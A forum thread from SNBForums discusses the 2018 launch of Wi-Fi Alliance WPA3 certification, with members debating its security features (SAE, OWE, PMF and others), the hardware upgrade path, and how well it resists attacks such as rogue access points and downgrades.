1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
Dismiss Notice

Welcome To SNBForums

SNBForums is a community for anyone who wants to learn about or discuss the latest in wireless routers, network storage and the ins and outs of building and maintaining a small network.

If you'd like to post a question, simply register and have at it!

While you're at it, please check out SmallNetBuilder for product reviews and our famous Router Charts, Ranker and plenty more!

Featured WPA3 Certification Open For Business

Discussion in 'General Wireless Discussion' started by thiggins, Jun 26, 2018.

  1. thiggins

    thiggins Mr. Easy Staff Member

    Joined:
    May 18, 2008
    Messages:
    13,509
    [​IMG]
    The Wi-Fi Alliance yesterday formally introduced Wi-Fi CERTIFIED WPA3 wireless security, the intended replacement for the less-secure WPA2, which is supported on virtually all of today's Wi-Fi devices.

    Like WPA2, WPA3 is not an IEEE standard, but a specification and certification program created by the Wi-Fi Alliance. Also like its predecessor, WPA3 comes in Personal and Enterprise flavors, the latter optionally supporting 192 bit encryption.

    The Alliance offers no summary of the differences between WPA2 and WPA3. But this DarkReading post from today offers a good description of WPA3's key features. This post by Mathy Vanhoef provides much-needed details about WPA3. And this newer post describes what the actual WPA3 Certification announced today really supports.

    Also announced was Wi-Fi CERTIFIED Easy Connect, which in earlier descriptions of WPA3, was part of that specification. It's now been broken into its own certification, however, because Easy Connect is focused on securely connecting devices with "limited or no" display. This would most commonly be done by scanning a QR code on the device using a smartphone or tablet.

    You'll be able to run mixed networks of WPA2 and WPA3 devices, once routers and APs supporting WPA3 appear. Eventually, however, WPA3 will become mandatory to access 11ac and 11ax features, just as WPA2/AES is required to access 802.11ac's higher link rates now.

    Don't expect to see firmware or driver upgrades enabling WPA3 for your current collection of devices. WPA3 requires new hardware, so you'll need to buy new stuff.

    The Alliance's Certified Product Finder already has checkboxes up for WPA3 and Wi-Fi Easy Connect, but no devices have been certified yet.

    [Wi-Fi Alliance press release.]
     
    Last edited: Jun 27, 2018
  2. Please support SNBForums! Just click on this link before you buy something from Amazon and we'll get a small commission on anything you buy. Thanks!
  3. Makaveli

    Makaveli Senior Member

    Joined:
    Nov 4, 2016
    Messages:
    293
    Location:
    Canada
    Finally.

    Now just waiting for Asus to release a model that support this and have a viable upgrade path.
     
  4. thiggins

    thiggins Mr. Easy Staff Member

    Joined:
    May 18, 2008
    Messages:
    13,509
    What do you mean by this? The upgrade path is: buy a new router and clients to go with it.
     
  5. coxhaus

    coxhaus Part of the Furniture

    Joined:
    Oct 7, 2010
    Messages:
    2,240
    Location:
    texas
    So are all wireless routers obsolete? Good thing I run a wired only router.
     
  6. Makaveli

    Makaveli Senior Member

    Joined:
    Nov 4, 2016
    Messages:
    293
    Location:
    Canada
    I understand that I just mean it an upgrade path for me since I've been waiting for this to be released instead of upgrading to a more powerful router right now.
     
  7. thiggins

    thiggins Mr. Easy Staff Member

    Joined:
    May 18, 2008
    Messages:
    13,509
    No. They're just less secure than WPA3 will be. But you're running with WPA2 now (I assume) and you ain't dead yet. :)

    You guys are old enough to remember the WEP -> WPA transition, right? And how throughput went to crap when you used WPA until they moved the encryption code from the driver to an embedded processor in the Wi-Fi MAC.

    We lived through that and we'll survive this transition too.
     
  8. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    Nope. Am dead already. *ded*

    I seriously might be a little salty that a single fell swoop just rendered pretty much every single wifi device I've ever tested obsolete. Granted we'll still be using the obsolete stuff for a bit, but...

    How sure are you that this stuff can't ever be implemented in firmware? Seems pretty crazy to suddenly obsolete every single chipset on the market for what seems to amount to a mediocre-at-best improvement.
     
  9. DancinJack

    DancinJack New Around Here

    Joined:
    Jun 26, 2018
    Messages:
    2
    That's...not true. WPA2 devices are not "obsolete." They're just not as secure as WPA3. It's not like you won't be able to use them for years to come. Let alone it'll take years for businesses and others to upgrade to WPA3 hardware. Can people please stop saying obsolete. It's not the right word choice. Please, stop.
     
    RMerlin likes this.
  10. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    Well, not yet anyway. But when the next KRACK hits, what are the odds anybody's going to bother fixing it on WPA2 now that nice and shiny WPA3 is here, and everybody wants to sell their nice and shiny new WPA3 devices anyway?
     
  11. DancinJack

    DancinJack New Around Here

    Joined:
    Jun 26, 2018
    Messages:
    2
    Considering there are literally billions of devices that will be on WPA2 forever, someone will do it. You think the whole world is just going to write off everything that is out there now? I don't think so :)
     
  12. umarmung

    umarmung Regular Contributor

    Joined:
    Apr 21, 2018
    Messages:
    186
    Not even remotely close to a mediocre-at-best improvement. This is the largest improvement in WiFi security, especially in enterprise, for over a decade. It is also night and day in security for open hotspots - so much so that this part is being rushed to market.
    1. Simultaneous Authentication of Equals handshake (SAE): offline dictionary attack resistant + forward secrecy
    2. Device Provisioning Protocol (DPP): WPS replacement using public keys
    3. Opportunistic Wireless Encryption (OWE): encryption by default for open networks, i.e. hotspots, defeating passive attacks
    4. Enterprise Commercial National Security Algorithms suite (CNSA): increased key sizes such as AES-GCM-256 & elliptic curve crypto 384-bit curves & SHA384 & RSA keys 3072+ == 192-bit security symmetric
    5. Protected Management Frames (PMF): post-KRACK vulnerability WPA2 and WPA3 requires support for PMF, preventing deauthentication attacks where APs can be forced to disconnect clients, a form of active attack
    This is still significantly behind the most up to date security standards, but the previous models are so weak in multiple areas, this is a very large security improvement.

    The last, PMF, can be quite easily retrofitted into existing devices via firmware. The rest includes new encryption and new uses of encryption, especially heavy in the case of CNSA.

    Economically, it makes little sense why manufacturers would choose to take on costly viability assessments and re-optimization within very tight hardare restrictions for most consumer and SOHO gear just to then offer it all as a free upgrade in firmware that only a fraction of its customer base may install. The increased resource usage is not in any way free, either labor, increased power requirements, increased operational requirements (temperature increases), increased validation and certification costs.

    Furthermore, even if sections of the new standard (other than PMF), could be implemented for a specific product or product line, it would be extremely unlikely all of them could be incorporated for the device to be WPA3 certifiable or even marketable as such. For consumer gear, lack of such clear differentiation will not help market a product.

    Finally, there is the perverse reputational risk of effectively choosing a mixed/segmented product line based on customer firmware uptake, then supporting it. That may be fine for enterprise and some SOHO customers. But for consumers, fielding entirely new, certified product lines earlier than competitors may be the safer business option.

    So, my belief is that far more likely, just like the previous WEP-WPA transition, there will be a slew of new hardware re-releases followed by further hardware-optimized releases, maximizing profitability and taking advantage of new resources like modern commodity chips.
     
    Last edited: Jun 26, 2018
    Moogle Stiltzkin and daviworld like this.
  13. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    Can you elaborate on this one? How will this defeat a typical wifi pineapple scenario in which an AP just yes "yep that's me" to any beacon request made by a STA?
     
  14. umarmung

    umarmung Regular Contributor

    Joined:
    Apr 21, 2018
    Messages:
    186
    That's not a passive attack :)

    At the moment, as I'm sure you are aware, you can just listen for every single packet on an open network.
     
  15. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    The transition will be more similar to the WPA to WPA2 move - and WPA3 devices must support WPA2, so the existing investment in clients/AP's is protected.
     
  16. Razor512

    Razor512 Senior Member

    Joined:
    Sep 29, 2012
    Messages:
    433
    During the transition period where most APs will have to use both WPA 2 and 3, is there any possible risk to a downgrade attack, or is it completely resistant to any form of downgrade attack if an attacker is actively interfering while a client is attempting to connect to the AP?
     
  17. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    It doesn't - WiFi pineapple MITM attacks will continue to be a problem... as just like WPA2, one can essentially take a client down to an appropriate level for, ahem, forensic analysis...

    Where OWE comes in to play is that unlike current implementations, where an Open network, everything is in the clear, on a WPA3 Open Network, you will have a temporary PMK, and each WPA3 client associated will have their own temporary one, so that solves the issue of just firing up a client STA in monitor mode and sucking down everyone's traffic on the BSS

    Not perfect, but it does help...
     
  18. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    I foresee this as an implementation detail - challenge here is that 802.11n/11ac require WPA2 - WPA3 wasn't around when the 11ac spec was passed, so all 802.11n/11ac capable AP's need to support both.

    11n/11ac - WPA1 was not officially supported, but many AP's can run in mixed mode, mainly to support legacy clients running 11g/11n or hopefully not 11b ;)
     
  19. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    One of the other things in Vanhoef's review - moving forward at some point, WPA2 certification will require Protected Management Frames - not sure how they're going to handle WPA2 legacy, as there are many 11n/11ac client stations that do not support PMF...
     
  20. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    daviworld and umarmung like this.
  21. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    I suppose I didn't really catch just how "passive" you meant.

    Yes I'm aware that any packet may be inspected on an open network; this is much less of a concern than it used to be due to the proliferation of TLS/SSL on (almost) all the things. Right now DNS is the remaining really weak point, but even that's rapidly evolving.

    As far as I'm concerned, until pineapple-style attacks are nerfed nothing's changed much.
     
Please support SNBForums! Just click on this link before you buy something from Amazon and we'll get a small commission on anything you buy. Thanks!